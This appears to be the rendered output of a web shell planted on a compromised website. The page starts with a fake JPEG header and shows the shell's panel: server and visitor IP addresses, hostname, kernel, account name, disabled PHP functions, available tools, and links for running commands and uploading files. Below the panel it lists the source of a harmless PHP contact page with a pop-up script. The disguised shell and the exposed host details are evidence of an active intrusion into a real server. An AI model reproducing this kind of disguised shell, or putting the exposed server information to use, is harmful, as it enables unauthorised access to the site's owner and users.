����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 3.129.67.218 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/mhmsfzcs/vflyorions.com/.well-known/../ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php $page = 'contact'; include 'header.php'; ?> <style type="text/css"> body { /* Your website styles go here */ } .popup { display: none; position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background: white; padding: 20px; border: 2px solid #333; box-shadow: 0 0 10px rgba(0, 0, 0, 0.5); z-index: 1000; } .popup-content { text-align: center; } .close-btn { position: absolute; top: 10px; right: 10px; font-size: 20px; cursor: pointer; } </style> <!-- Your website content goes here --> <div class="popup" id="popup"> <div class="popup-content"> <span class="close-btn" onclick="closePopup()">×</span> <p>This is a pop-up message!</p> </div> </div> <script type="text/javascript"> document.addEventListener("DOMContentLoaded", function () { setTimeout(function () { showPopup(); }, 0); }); function showPopup() { var popup = document.getElementById("popup"); popup.style.display = "block"; } function closePopup() { var popup = document.getElementById("popup"); popup.style.display = "none"; } </script> </body> </html>